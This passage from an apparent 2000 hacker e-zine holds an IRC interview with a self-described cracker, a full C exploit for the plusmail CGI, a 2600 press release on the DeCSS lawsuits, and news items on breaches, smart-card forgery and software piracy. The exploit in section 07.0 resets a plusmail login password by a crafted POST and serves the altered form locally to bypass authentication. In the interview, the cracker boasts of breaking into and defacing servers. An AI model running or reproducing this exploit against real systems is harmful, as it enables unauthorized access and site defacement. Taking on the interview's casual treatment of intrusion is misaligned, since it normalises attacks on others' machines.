infected with the bug. WebTV had previously created fixes for the two
separate problems when they originally surfaced. The company is working
on a more comprehensive patch to be released next week.
In the meantime, users should open their signature file to check if any
new text or code has been inserted, the WebTV representative said.
@HWA
06.0 BlaznWeed interview, background info, and Sect0r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Cruciphux
BlaznWeed contacted me regarding commenting on some of the things Sect0r said
in the interview last issue, so we address those and get a general interview
as well... mildly edited to remove general chatter. - Ed
Interview date: Sun Mar 19/2000
By: Cruciphux
Session Start: Sun Mar 19 15:26:53 2000
[15:26] Session Ident: BlaznWeed (some1@*.*.*.uk)
[15:26] <BlaznWeed> i'm ready
[15:27] <Cruciphux> ok hi.. sorry to keep ya waiting
[15:27] <BlaznWeed> np
[15:27] <Cruciphux> i'm pretty informal, no real structure
[15:28] <BlaznWeed> thats fine by me
[15:28] <Cruciphux> i'll do the preliminary intro questions ...
[15:28] <Cruciphux> like age interest group affiliations etc
[15:28] <BlaznWeed> i'm 20 and my group is wkD
[15:29] <Cruciphux> whats wkD stand for?
[15:29] <Cruciphux> and how long has it been around?
[15:29] <BlaznWeed> wicked
[15:29] <Cruciphux> how many members and where are they based?
[15:29] <Cruciphux> how did you meet? irc?
[15:29] <Cruciphux> :
[15:29] <BlaznWeed> there are many members
[15:30] <BlaznWeed> and i don't know them all
[15:30] <Cruciphux> some in other groups too?
[15:30] <BlaznWeed> I got introduced to wkD by zeroc
[15:30] <BlaznWeed> who is the founder
[15:30] <BlaznWeed> I don't think so
[15:30] <BlaznWeed> but i can't say for sure
[15:30] <BlaznWeed> he hangs on dalnet mostly
[15:31] <Cruciphux> you too?
[15:31] <BlaznWeed> yeah
[15:31] <Cruciphux> why dalnet? any reason?
[15:31] <BlaznWeed> Most of my freinds are on dalnet
[15:31] <Cruciphux> how long have you been on the net?
[15:32] <BlaznWeed> about three four years
[15:32] <BlaznWeed> to
[15:32] <Cruciphux> how long have you been into computers? same time or
longer?
[15:32] <BlaznWeed> the nets is relatively new here in the uk
[15:32] <BlaznWeed> longer
[15:32] <BlaznWeed> about six maybe 7
[15:33] <Cruciphux> how would you classify yourself? ie: hacker cracker
coder scriptkid <sic>
[15:33] <Cruciphux> and do you code? if so in what?
[15:33] <BlaznWeed> hehe
[15:33] <BlaznWeed> yes i do code
[15:34] <BlaznWeed> but i haven't written my own exploits yet
[15:34] <Cruciphux> oh I forgot 'defacer'
[15:34] <Cruciphux> :)
[15:34] <BlaznWeed> i'm a full time computer science student
[15:34] <BlaznWeed> i suppose i'd be labeled a cracker
[15:34] <Cruciphux> so you break into sites but don't deface all of them?
[15:35] <BlaznWeed> If i manage to break into a unix box i don't defeace
them
[15:35] <Cruciphux> about how many have you done?
[15:35] <BlaznWeed> simply because i have other uses for them
[15:35] <Cruciphux> and how long have you been doing it?
[15:35] <BlaznWeed> but the N boxes i have no use for
[15:35] <Cruciphux> nod
[15:36] <BlaznWeed> maybe a couple of years now
[15:36] <BlaznWeed> i started of hacking nothing but unix boxes
[15:36] <Cruciphux> what is your home machine? if more than one box whats
your setup?
[15:36] <BlaznWeed> I actually enjoy playing hide a nd seek with admins
[15:36] <Cruciphux> heh
[15:36] <Cruciphux> battle of wits
[15:37] <BlaznWeed> I'm just running linux at home
[15:37] <BlaznWeed> but i used to eun solaris
[15:37] <BlaznWeed> but the thing with solaris is that it doesn't run very
well on x86 proccesssors
[15:38] <BlaznWeed> so i'm stuck with linux until i can afford a sparc
[15:38] <Cruciphux> I don't like solaris
[15:38] <BlaznWeed> solaris and linux are like blondes and brunettes i like
em both
[15:38] <BlaznWeed> :D
[15:38] <Cruciphux> and its worse on x86 processors
[15:39] <Cruciphux> what about *BSD?
[15:39] <Cruciphux> its closer to real unix than linux*
[15:39] <BlaznWeed> I haven't tried that
[15:39] <BlaznWeed> though i do have a couple of bsd shells
[15:39] <BlaznWeed> legit ones mind
[15:40] <Cruciphux> without giving details outline a typical hack, ie: what
do you use as a base point, do you use pbx or redirectors
to dial into hacked accts etc, what country do you use etc
[15:40] <BlaznWeed> yeah i notice
[15:41] <BlaznWeed> no comment
[15:41] <Cruciphux> hehe
[15:41] <Cruciphux> damn that was the most interesting too
[15:41] <Cruciphux> :)
[15:41] <BlaznWeed> :)
[15:43] <BlaznWeed> well i suppose this interview gives me the perfect
opportunity to address some of the misleading comments
written by secto0r in the last issue of hwa
[15:43] <Cruciphux> I was about to approach that
[15:43] <Cruciphux> initially sect0r said he and you were 'ok' after the
defacement log incident
[15:44] <BlaznWeed> yeah i thought we were ok too
[15:44] <BlaznWeed> "He" claims i'm a wannabe with no skills,
[15:44] <BlaznWeed> this is funny since it was only the other day he asked me
[15:44] <BlaznWeed> to deface a web site for him
[15:45] <Cruciphux> hrm
[15:45] <BlaznWeed> "He" claims he could have redefaced my stuff easily
[15:45] <BlaznWeed> this is funny again since he had to come and ask me to do
his chores.
[15:45] <Cruciphux> yeah in the interview he said
[15:45] <Cruciphux> [20:03] <sect> i had someone akicked from #hackers on dalnet,
[15:45] <Cruciphux> the kid retaliated, what can i say?
[15:45] <BlaznWeed> And even if he did know how to redeface my stuff he wouldn't
have gotten
[15:45] <BlaznWeed> very far since I patched all the box's I hacked.
[15:45] <Cruciphux> [20:04] <sect> that would be blazinweed, he is basically a
[15:45] <Cruciphux> wannabe with no skills to speak of.
[15:45] <Cruciphux> [20:04] <sect> i would have re-defaced his stuff easily
[15:45] <Cruciphux> (nt boxen), but i'm not down with that
anymore.
[15:45] <Cruciphux> ...
[15:45] <BlaznWeed> He also highlights the fact
[15:45] <BlaznWeed> that they were only NT boxes that were defaced well
i'd like to respond to this by saying i only deface
NT boxes because i have no use for them but the unix
boxes I keep btw he runs windows :D
[15:45] <Cruciphux> good point
[15:46] <BlaznWeed> I'd also like to say a few things about the plusmail
exploit
[15:46] <BlaznWeed> that he and ytcracker talked about. I've never heard
so much bull ever.
[15:46] <BlaznWeed> the Hole was found by Herf (of wkD which is my group
also)
[15:46] <Cruciphux> but people take notice of defacements because they
are 'public' and summarily judge people in the 'scene'
by their web 'hacks'
[15:46] <BlaznWeed> and all it required was a simple html file that you
loaded in your browser
[15:46] <BlaznWeed> which then allowed you to bypass the login screeen on
dumb servers running plusmail.btw the scanner was
written by ytcracker and it was useless anyway since
next to no servers run the vulnerable package and the
ones that do have long since patched it.
[15:47] <BlaznWeed> This is the reason you didn't see it get a slot at
securityfocus.
[15:47] <Cruciphux> * plusmail cgi exploit
[15:47] <Cruciphux> - missnglnk
[15:47] <Cruciphux> greets: herf, ytcracker, mosthated, tino
[15:47] <Cruciphux> that one? or a variant
[15:47] <BlaznWeed> variant
[15:47] <Cruciphux> ok
[15:47] <Cruciphux> thats on packetstorm btw
[15:47] <BlaznWeed> I was one of the first people to have it
[15:48] <Cruciphux> http://packetstorm.securify.com/0001-exploits/plusmail.c
[15:48] <BlaznWeed> hrm
[15:49] <Cruciphux> have you confronted sect0r about his comments?
[15:49] <Cruciphux> if so what happened
[15:49] <Cruciphux> if not why not
[15:49] <Cruciphux> :)
[15:49] <BlaznWeed> he left before i could
[15:50] <BlaznWeed> someone found all his personel info
[15:50] <Cruciphux> nod I'm aware of that
[15:50] <BlaznWeed> and he is gone to hide
[15:52] <Cruciphux> anything else you'd like to say? there isn't that much we
haven't covered really
[15:53] <Cruciphux> we don't need to drag it out
[15:53] <Cruciphux> :)
[15:53] <BlaznWeed> :D
[15:53] <BlaznWeed> I think i've readdressed the balance
[15:53] <Cruciphux> do you guys have a site for instance?
[15:53] <Cruciphux> website that is
[15:53] <BlaznWeed> yeah but its private
[15:54] <Cruciphux> if you think of anything to add lemme know
[15:54] <BlaznWeed> ok
[15:54] <Cruciphux> my email is cruciphux@dok.org
[15:54] <BlaznWeed> thanks
[15:54] <Cruciphux> if i'm not online
[15:54] <Cruciphux> tnx
[15:54] <Cruciphux> -end-
Session Close: Sun Mar 19 15:55:19 2000
@HWA
07.0 plusmail cgi exploit
~~~~~~~~~~~~~~~~~~~~
/*
* plusmail cgi exploit
- missnglnk
greets: herf, ytcracker, mosthated, tino
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>
extern int errno;
int
main(int argc, char **argv)
{
int argswitch, tport = 80, sockfd, plen, cltlen, lport = 4040;
char *target, tmpdata[32768], *password = "default",
*username = "jackdidntsetone", pdata[1024], *errcode,
*tmpline, *firstline, clntfd, origdata[32768], htmldata[32768];
struct sockaddr_in rmt, srv, clt;
struct hostent *he;
unsigned long ip;
if (argc < 5) {
printf("plusmail cgi exploit by missnglnk\n");
printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]);
return -1;
}
while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) {
switch (argswitch) {
case 'h':
if (strlen(optarg) > MAXHOSTNAMELEN) {
printf("ERROR: Target hostname too long.\n");
return -1;
}
target = optarg;
break;
case 'p':
tport = atoi(optarg);
break;
case 'n':
if (strlen(optarg) > 8) {
printf("Password length greater than 8 characters.\n");
return -1;
}
password = optarg;
break;
case 'u':
if (strlen(optarg) > 8) {
printf("Username length greater than 8 characters.\n");
return -1;
}
username = optarg;
break;
case 'l':
lport = atoi(optarg);
break;
case '?':
default:
printf("plusmail cgi exploit by missnglnk\n");
printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]);
return -1;
break;
}
}
argc -= optind;
argv += optind;
bzero(&rmt, sizeof(rmt));
bzero(&srv, sizeof(srv));
bzero(&clt, sizeof(clt));
bzero(tmpdata, sizeof(tmpdata));
cltlen = sizeof(clt);
if ((he = gethostbyname(target)) != NULL) {
ip = *(unsigned long *) he->h_addr;
} else if ((ip = inet_addr(target)) == NULL) {
perror("Error resolving target");
return -1;
}
rmt.sin_family = AF_INET;
rmt.sin_addr.s_addr = ip;
rmt.sin_port = htons(tport);
srv.sin_family = AF_INET;
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons(lport);
if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("Error creating socket");
return -1;
}
if (connect(sockfd, (struct sockaddr *) & rmt, sizeof(rmt)) < 0) {
perror("Error connecting");
return -1;
}
snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk", username, password, password);
plen = strlen(pdata);
snprintf(tmpdata, sizeof(tmpdata), "POST /cgi-bin/plusmail HTTP/1.0\n" \
"Referer: http://www.pure-security.net\n" \
"User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n" \
"Host: %s\n" \
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n" \
"Accept-Encoding: gzip\n" \
"Accept-Language: en\n" \
"Accept-Charset: isp-8859-1,*,utf-8\n" \
"Content-type: application/x-www-form-urlencoded\n" \
"Content-length: %d\n" \
"\n%s\n", target, plen, pdata);
if (write(sockfd, tmpdata, strlen(tmpdata)) < strlen(tmpdata)) {
perror("Error writing data");
return -1;
}
bzero(tmpdata, sizeof(tmpdata));
while (read(sockfd, tmpdata, sizeof(tmpdata)) != 0) {
strncpy(origdata, tmpdata, sizeof(origdata));
firstline = strtok(tmpdata, "\n");
bzero(tmpdata, sizeof(tmpdata));
if ((errcode = strstr(firstline, "404")) != NULL) {
printf("plusmail.cgi aint here buddy.\n");
return -1;
}
for ((tmpline = strtok(origdata, "\n")); tmpline != NULL; (tmpline = strtok(NULL, "\n"))) {
if ((errcode = strstr(tmpline, "<form action")) != NULL) {
// sprintf(htmldata, "%s<form action = \"http://%s/cgi-bin/plusmail\" method = \"post\">\n", htmldata, target);
snprintf(htmldata, sizeof(htmldata), "%s<form action = \"http://%s/cgi-bin/plusmail\" method = \"post\">\n", htmldata, target);
} else {
// sprintf(htmldata, "%s%s\n", htmldata, tmpline);
snprintf(htmldata, sizeof(htmldata), "%s%s\n", htmldata, tmpline);
}
}
}
if (close(sockfd) < 0) {
perror("Error closing socket");
return -1;
}
strncat(htmldata, "\n<br><missnglnk>\0", sizeof(htmldata));
if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("Error creating socket");
return -1;
}
printf("waiting on port %d...", lport);
if (bind(sockfd, (struct sockaddr *) & srv, sizeof(srv)) < 0) {
perror("Error binding to socket");
return -1;
}
if (listen(sockfd, 0) < 0) {
perror("Error setting backlog");
return -1;
}
if ((clntfd = accept(sockfd, (struct sockaddr *) & clt, &cltlen)) < 0) {
perror("Error accepting connection");
return -1;
}
printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port));
if (!write(clntfd, htmldata, sizeof(htmldata))) {
perror("Error writing data");
return -1;
}
if (close(clntfd) < 0) {
perror("Error closing socket");
return -1;
}
printf("\n%s\n", htmldata);
return 0;
}
@HWA
08.0 2600 activism against the MPAA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.2600.com/
http://www.2600.com/news/2000/0130.html
February 2, 2000
FOR IMMEDIATE RELEASE
DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES
Members of the hacker and open source communities worldwide, along with
various civil liberties groups, are planning a massive leafletting
campaign on Friday, February 4 to call attention to the recent attempts
by the Motion Picture Association of America to shut down thousands of
websites.
Lawsuits have been filed against hundreds of people, as well as an Internet
Service Provider and a magazine, for having information the MPAA wants
to keep secret.
The controversy centers around a computer program known as DeCSS, thought to
be written by a 16 year old in Norway. The program defeats the encryption
scheme used by DVD's which prohibits them from being viewed on non-approved
machines or computers. It also enables DVD's from one country to be
played in another, contrary to the wishes of the movie industry. It does
NOT facilitate DVD piracy - in fact, copying DVD's has been possible
since their introduction years ago. In its press releases on the subject,
the MPAA has claimed that this is a piracy issue and they have subsequently
succeeded in getting injunctions against a number of sites that had
posted the program in the interests of free speech.
This is in effect a lawsuit against the entire Internet community by
extremely powerful corporate interests. The lawsuit and the various
actions being planned promise to be a real showdown between two increasingly
disparate sides in the technological age. The consequences of losing this
case are so serious that civil libertarians, professors, lawyers, and a
wide variety of others have already stepped forward to help out.
Friday's action will be coordinated in 74 cities throughout North America
and 26 cities in other parts of the world. Leafletting will take place
outside theaters and video stores in these cities - all of which
participate in a monthly "2600" gathering. 2600 Magazine has been named
in two lawsuits regarding the DeCSS program and has joined with the
the growing number of people who will fight these actions by the MPAA
until the end.
The lawsuit has been filed by the Motion Picture Association of America,
Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney
Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and
Time Warner Entertainment.
Contact:
Emmanuel Goldstein
(631) 751-2600 ext. 0
leaflet campaign:
~~~~~~~~~~~~~~~~~
CALL TO ACTION
01/30/00
Thousands of copies of the flyer have already
been distributed at movie theaters worldwide. Versions are also being made
in different languages. The next step will involve a massive action this
Friday, February 4, 2000.
We call on all 2600 meetings held around the world on that day to head to
the local theaters and spread the word of this travesty of justice by
handing out as many flyers as possible. Everyone is invited to show up and
participate, bring your friends, tell your local Linux User Group, spread
the news to any organization you're part of, and join us in advocating
justice. We find that once people are made aware of the facts of the case,
they become as outraged as we have.
TIPS FOR HANDING OUT FLYERS First, make sure you make the flyers
distinctive by printing on colored paper if at all possible. The quickest
way to do this is to go to a copy shop. Get several hundred at the very
least - you WILL go through them quickly. Make sure you can print more if
you need them.
Familiarize yourself with the facts of the case as presented on
www.opendvd.org. It's important to be able to answer questions of people
who are interested in learning more. Remember, this is NOT about DVD piracy
- that is how the movie industry is trying to portray this case. The issue
here is CONTROL of players - whether you have the right to play DVD's on
the computer of your choice and whether you should be able to see DVD's
from other countries. As well as our freedom to continue reporting on the
events, developments and discoveries of the hacker community, in a full and
accurate manner.
We find that people respond well to "Protect Your Rights" as a catch phrase
to get them to take the flyer. Let us know if others work for you. Be
courteous to the people passing by - don't block their path and, if they
ignore you or even make a snide remark, don't heckle them. We find that the
vast majority of people are polite and interested in what you have to say.
You'll find that some will even come up to you asking for more flyers! Have
a set of master copies (printed on white paper) for others to make copies
of their own and hand out in other places.
If you are asked to leave by theater management, cooperate and ask them
where they would like you to stand. They can't force you to leave the area,
only the part that is their property. You can still successfully hand out
material to everyone coming and going by positioning yourself in
neighboring areas or even in the parking lot. If things become unpleasant,
simply head to another theater in a different part of town. (If you run out
of theaters, you can always fall back on video stores.) We find that 90% of
such confrontations can be averted by befriending security guards and
making it clear that you don't intend to be disruptive.
@HWA
09.0 Microsoft sends magazine full versions of Windows 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by TRDonJuan
(Translated from German by Babelfish)
http://www.pcwelt.de/content/news/newwindows/2000/03/xn160300005.html
Microsoft gave away inadvertently 100,000 Windows-2000-Kopien in the
value of approximately 33 million dollar to private users. How the
Spanish intelligence service Brujula.com reports, Microsoft wanted to
actually pack on 120 days the limited version of the operating system
on booklet DS, those approximately 100,000 outputs of the Spanish
PC WELT sister " PC World " supplements. Afterwards it turned out
however that it concerned at the software a temporally unlimited
version inclusive Registrations code.
Thus 100,000 installations of Windows are 2000 without license in
the circulation. And with a selling price of 330 dollar per copy
might have developed for Microsoft a financial damage of 33 million
dollar.
Who caused the error, is not certain officially. Insider assume
however not the magazine, but Microsoft is responsible for the
breakdown. Some whisper even, Microsoft
-=-
Win 2000 gratis auf CD
Microsoft hat versehentlich 100.000 Windows-2000-Kopien im Wert von
rund 33 Millionen Dollar an private Anwender verschenkt. Wie der
spanische Nachrichtendienst Brujula.com berichtet, wollte Microsoft
eigentlich die auf 120 Tage limitierte Version des Betriebssystems auf
Heft-CDs packen, die rund 100.000 Ausgaben der spanischen
PC-WELT-Schwester "PC World" beilagen. Im Nachhinein stellte sich
jedoch heraus, dass es sich bei der Software um eine zeitlich unbegrenzte
Version inklusive Registrations-Code handelte.
Damit sind 100.000 Installationen von Windows 2000 ohne Lizenz im
Umlauf. Und bei einem Verkaufspreis von 330 Dollar pro Kopie d�rfte
Microsoft ein finanzieller Schaden von 33 Millionen Dollar entstanden sein.
Wer den Fehler verursacht hat, steht offiziell noch nicht fest. Insider gehen
jedoch davon aus, dass nicht die Zeitschrift, sondern Microsoft selbst f�r
die Panne verantwortlich ist. Manche munkeln sogar, Microsoft habe die
Vollversion absichtlich auf die CDs gepackt, um die Verkaufszahlen von
Windows 2000 in die H�he zu treiben, und das Ganze anschlie�end als
Versehen deklariert. Denn aufgrund der Monopolstellung, die dem
Software-Riesen angekreidet wird, k�nne er das Betriebssystem nicht
offiziell verschenken.
Die Ausgabe der PC World Spanien, der die CD-ROM beilag, erzielte auf
jeden Fall einen Verkaufsrekord. (PC-WELT, 16.03.2000, sp)
@HWA
10.0 HNN:Mar 13th:Mexican Rebels Breached Pentagon Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
According to Arthur L. Money, the chief information
officer of the US Defense Department, Mexican
Zapatista guerrillas managed to breach the online
security systems of some pentagon computers in 1998.
Money said that the intruders used systems from the
Frankfurt Stock Exchange to launch their attacks.
Agence France-Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500179791-500236658-501166899-0,00.html
(Sorry: 404 or expired story link)
@HWA
11.0 HNN:Mar 13th:Online Guerrilla War Rages In Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Online warez groups fighting amongst each other is now
considered guerrilla warfare by authorities in Brazil.
According to the daily O Globo the Brazilian Hacker
Organization (OHB) and the Anti-OHB have been trading
insults via web defacements for some time. The Sao
Paulo Civil Police Cybercrime Unit is also following
attacks by three other active organizations: Hatted
Copr, InfernBr and Crime Boys.
EFE via COMTEX - via Northern Light
http://library.northernlight.com/FC20000310060000049.html?cb=0&dx=1006&sc=0#doc
(Pay to play document sorry ... - Ed)
@HWA
12.0 HNN:Mar 13th:French Bank Card Algorithm Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by alan.hop
Serge Humpich was sentenced to a ten month
suspended sentence after notifying the French bank,
Cartes Bancaires, that its bank cards where vulnerable
to fraud. Now the secret that Humpich discovered has
been released to the Internet. Bank officials say that
the potential for fraud or fake cards is small while
security experts fear that the underground will flood the
market with fake cards within weeks.
Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000310/wr/france_cards_1.html
Friday March 10 3:07 PM ET
Card Alert for French Banks
By Catherine Bremer
PARIS (Reuters) - France braced for a wave of petty fraud after officials
admitted on Friday that a formula posted on the Internet showed how to
forge smart payment cards.
But Cartes Bancaires, the French interbank group whose card system is
affected, said there was no danger that bank accounts would be emptied.
Cards made with the formula might be used to buy train tickets or pay
parking meters or toll booths although there was no evidence this had
actually happened, Cartes Bancaires spokesman Herve de Lacotte told
Reuters.
``For the first time in 10 years, a lock has been sprung,'' he said. ``But
springing a lock will not necessarily open the door and let you in. There
is a theoretical risk of fraud but the problem concerns banks, not
consumers or shops.''
Despite claims to the contrary, Lacotte said, false cards made with the
code could not be used in cash dispensers, to make shop purchases or for
expensive goods.
Newspapers leaped on the story, quoting experts as saying the complex
96-digit code could be used to forge three in four of France's 34 million
bank cards.
Headlines like ``Chip card secret out'' left anyone with a bank card
wondering whether their money was safe.
``Consumers have been paying for bank cards that aren't even secure.
They've been cheated and lied to,'' said Eric April, Secretary-General of
the AFOC consumer group.
Lacotte said the scare stories were over the top and the Bank of France
accused the press of ``exaggerating the risk.''
``Even if certain clues relating to this algorithm have been made
public... other security measures exist enabling strong limits on the use
that can be made of this information,'' the French central bank said in a
statement.
Cards issued since last autumn had added security which meant the pirate
formula would not work for them, he added.
SCSSI, the government body in charge of information security systems,
urged banks to replace older cards with updated ones.
The card formula was posted anonymously on Internet chat site last
weekend. It was actually discovered three years ago by computer whizz kid
Serge Humpich, who denies using it or circulating but has been given a
10-month suspended prison sentence for cracking the banks' secret.
Now that it is public, Humpich says, pirates could buy a chip card kit for
around $370 and be turning out false cards within weeks.
``A few weeks from now dozens of false cards are going to appear,'' he
told Liberation.
@HWA
13.0 HNN:Mar 13th:Still No Suspects in DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Investigators are still sifting through mountains of log
files but are having a rough time tracing the recent
denial of service attacks against online giants Yahoo,
ZD Net, CNN, and others. Officials still do not have any
suspects and hope that more traditional methods will
allow them to locate the culprit(s).
San Jose Mercury News
http://www.mercurycenter.com/svtech/news/indepth/docs/hack031000.htm
Posted at 8:28 p.m. PST Thursday, March 9, 2000
No suspects in cyberattacks
Investigators try to track down origin of last month's assaults
BY DAVID L. WILSON Mercury News Washington Bureau
WASHINGTON -- Federal authorities are continuing to investigate last
month's series of attacks on commercial Internet sites, but sources
close to the investigation say they have no suspects yet.
Investigators are sifting through mountains of data, trying to track the
attacks back to their origin using logs from the computers involved, but
they concede that building a case using such methods may be difficult, if
not impossible. Some believe that a break in case is more likely to come
from more traditional methods.
``Often what you see in a cold case is a lead coming from someone who is
in custody on an unrelated minor charge who offers information in return
for a get-out-of-jail-free card,'' said one person with ties to the
investigation. ``If somebody brags that he was behind this, eventually
somebody else will roll over on him.''
Often, however, the braggarts are blowing smoke. For instance, a
17-year-old who goes by the moniker ``Coolio'' hinted in online chats that
he was behind at least some of the attacks. But federal authorities
say there is no evidence that the youth, Dennis Moran of Wolfboro, N.H.,
was involved. However, Wednesday Moran was charged with two counts of
unauthorized access to a computer system in connection with vandalism to
the Los Angeles Police Department Web site DARE.com.
In last month's attacks on popular Web sites such as Yahoo, eBay and CNN,
suspects used a specialized technique known as a distributed denial of
service attack. The technique depends on stealth software that has
been secretly installed on hundreds of computers connected to the
Internet. At a given signal, the programs attack a targeted Web site,
flooding it with so much data that normal business is impossible.
Investigators are using log files from the computers infected with the
stealth software, hoping to track the trail back to the individual who
installed the programs, but they have been unsuccessful so far.
The difficulties investigators face were summed up in a 60-page report the
federal government released Thursday. In a news conference discussing the
report, Attorney General Janet Reno said law enforcement faces a
number of challenges in cyberspace.
``These challenges include the inability to trace criminals who hide their
identities online, difficulty in finding criminals who might be located in
other jurisdictions, the need for better coordination among law
enforcement agencies, and the need for trained personnel at all levels of
law enforcement,'' Reno told reporters.
The report generally said that existing laws could deal with crimes in
cyberspace. In addition, while highlighting advantages criminals can gain
from anonymity on the Internet, the report stressed that anonymity
is both important and useful for average citizens. It suggested that any
proposed changes in the availability and use of anonymity must be
considered very carefully.
Despite the report's measured tone, some groups feared a loss of privacy
for individuals who could find their every movement in cyberspace tracked
if they couldn't maintain anonymity.
The American Civil Liberties Union blasted the report in a letter to Reno.
``An end to Internet anonymity would chill free expression in
cyberspace,'' the letter declared. ``However, the report treats the
anonymity of Internet users as a `thorny issue' rather than a
constitutional right.''
Administration officials said the report was merely a starting point for
an examination of security in cyberspace, and that the government was
fully committed to maintaining privacy for Internet users.
Contact David L. Wilson at (202) 383-6020 or dwilson@sjmercury.com
@HWA
14.0 HNN:Mar 13th:Japanese Pirates Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
In a report released on March 10th, the Associated
Computer Software Copyright Society (ACCS) disclosed
two recent cases of piracy involving Internet bulletin
boards. A Hokkaido University student living in Sapporo
was arrested for selling as many as 30 illegal copies of
Microsoft's Office 2000 Professional and other software.
He charged a total of 500,000 yen (US$4,693.51) for
the CDR copies. A 24-year-old worker living in Takasaki,
Gunma prefecture was also recently arrested for
advertising and selling illegal software via an Internet
bulletin board. He sold software to 20 people for
100,000 yen (US$938.70). He said that he began selling
pirated software after he purchased some in the same
way.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/96759
Pirated Software Sales Rampant on Internet Bulletin Board
March 13, 2000 (TOKYO) -- A series of recent cases have revealed the extent
to which Internet bulletin boards are being used in Japan to sell pirated
software.
The Associated Computer Software Copyright Society (ACCS) disclosed the
extent of the situation on March 10.
In just the last 10 days, two cases of copyright violation have been
brought to light by the Metropolitan Police Agency and the Aichi Prefecture
Police.
On Feb. 29, the Metropolitan Police Agency submitted documents to the Tokyo
District Public Prosecutors Office regarding the activities of a
22-year-old Hokkaido University student living in Sapporo. The student was
using an electronic bulletin board to advertise the sale of pirated
software and was accepting orders via e-mail.
The items included Microsoft's Office 2000 Professional as well as other
office and game software copied to CD-R disks without the copyright
holders' permission.
Between February and October 1999, the student reportedly sold illegally
copied software to some 30 individuals nationwide for a total of about
500,000 yen. (106.53 yen = US$1)
The other incident, uncovered by the high-tech crime unit of the Aichi
Prefecture Police, involved a 24-year-old worker living in Takasaki, Gunma
prefecture. A report on the suspect was submitted to the Nagoya District
Public Prosecutors Office on March 1.
Like the Sapporo student, the suspect is accused of using a bulletin board
operated by a leading Internet service provider to advertise the sale of
pirated software and accept online orders. The accused is believed to have
sold the software to 20 people during the course of about one month,
generating some 100,000 yen in sales. He reportedly confessed that he began
selling pirated software after buying it in a similar manner himself.
(BizTech News Dept.)
@HWA
15.0 HNN:Mar 13th:Online Handles Impose Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Do the handles chosen by online hooligans chosen in an
attempt to impose fear? Matt Richtel of the NY Times
attempts to explore the meanings of some of the more
glamorous handles of the online world. (To bad he
completely misses the personal privacy angle. And what
about entertainers like Sting, Madonna, John Couger, or
Prince?)
NY Times
http://www.nytimes.com/library/review/031200hacker-handles-review.html
(Pay to play url... sorry -Ed)
@HWA
16.0 HNN:Mar 13th:Vendors Still Making Insecure Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
At a recent congressional panel examining the threat to
federal and private-sector computer networks cyber
security experts blamed software manufacturers for
failing to improve the security features of most
consumer software.(People in the underground have
been saying this for years.)
Reuters - via Excite
http://news.excite.com/news/r/000309/15/net-tech-hacker
(Server:We're sorry, but this story is not currently available - Ed)
@HWA
17.0 HNN:Mar 14th:Smart Card Inventor Issues Challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acoplayse
Roland Moreno, whose smart cards he invented have
slashed the fraud rate in France by 90 percent in 10
years, rejected claims that an algorithm posted on a
Web chat site last week could bypass the cards
safeguards. He is so confident of his product that he is
offering a million francs ($148,100) to anyone who could
prove that they could read a bank's confidential code
from the card. Moreno went on to claim that "chip cards
are an unpenetrable data system." (So unpenetrable
that Serge Humpich recently received a 10 month
suspended sentence for defeating the system.)
Reuters
http://newsnet.reuters.com/cgi-bin/basketview.cgi?b=rcom:science&s=nL133221
From above url;
"Boston conventions threaten biotech food fight"...
<snip>
(Appears to be incorrectly linked .. not having much luck
following up articles this week :/ sorree .. - Ed)
@HWA
18.0 HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Macki
In the past two months the Motion Picture Association
of America has continued to harass and intimidate
Internet users all over the world. Letters have been
